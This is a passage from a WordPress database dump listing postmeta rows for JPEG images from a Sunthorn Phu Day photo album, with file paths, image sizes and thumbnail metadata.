ize\";i:22765;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4972,1787,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_14.jpg'),
(4973,1787,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_14.jpg\";s:8:\"filesize\";i:564831;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_14-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17337;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_14-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160357;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8161;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_14-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95471;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_14-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:316039;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_14-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22610;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4974,1788,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_9.jpg'),
(4975,1788,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:65:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_9.jpg\";s:8:\"filesize\";i:515648;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_9-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17762;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_9-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151809;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8879;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_9-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92706;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_9-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:292932;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_9-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23151;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4976,1789,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_10.jpg'),
(4977,1789,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_10.jpg\";s:8:\"filesize\";i:603023;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_10-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19806;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_10-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177704;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9537;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_10-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107463;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_10-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:343126;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_10-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25616;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4978,1790,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_6.jpg'),
(4979,1790,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:65:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_6.jpg\";s:8:\"filesize\";i:560711;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19023;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_6-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168497;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8947;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_6-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102693;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_6-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:322464;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_6-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25170;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4980,1791,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_8.jpg'),
(4981,1791,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:65:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_8.jpg\";s:8:\"filesize\";i:553738;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_8-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19865;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_8-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168640;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9773;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_8-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103629;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_8-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:319168;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_8-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25902;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4982,1792,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_7.jpg'),
(4983,1792,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:65:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_7.jpg\";s:8:\"filesize\";i:526262;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_7-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17678;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_7-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155188;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8136;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_7-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93856;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_7-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:299942;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_7-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23006;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4984,1793,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_11.jpg'),
(4985,1793,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_11.jpg\";s:8:\"filesize\";i:514692;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_11-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17175;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_11-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149347;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8552;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_11-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90331;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_11-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:290218;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_11-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22394;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4986,1794,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_5.jpg'),
(4987,1794,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:65:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_5.jpg\";s:8:\"filesize\";i:600722;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_5-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19277;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_5-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177757;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9357;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_5-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107407;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_5-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:343335;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_5-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25306;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4988,1795,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_4.jpg'),
(4989,1795,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:65:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_4.jpg\";s:8:\"filesize\";i:573635;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19693;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_4-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172504;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9476;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_4-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105183;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_4-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:329684;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25565;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4990,1796,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_3.jpg'),
(4991,1796,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:65:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_3.jpg\";s:8:\"filesize\";i:680430;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17922;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_3-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184577;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8343;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107342;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_3-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:372627;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23389;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4992,1797,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_1.jpg'),
(4993,1797,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:65:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_1.jpg\";s:8:\"filesize\";i:615126;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18836;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172180;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9642;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102281;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:340998;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24307;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4994,1798,'_wp_attached_file','2025/07/LINE_ALBUM_วันสุนทรภู่_250626_2.jpg'),
(4995,1798,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:65:\"2025/07/LINE_ALBUM_วันสุนทรภู่_250626_2.jpg\";s:8:\"filesize\";i:598366;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18803;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172488;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9379;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103342;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\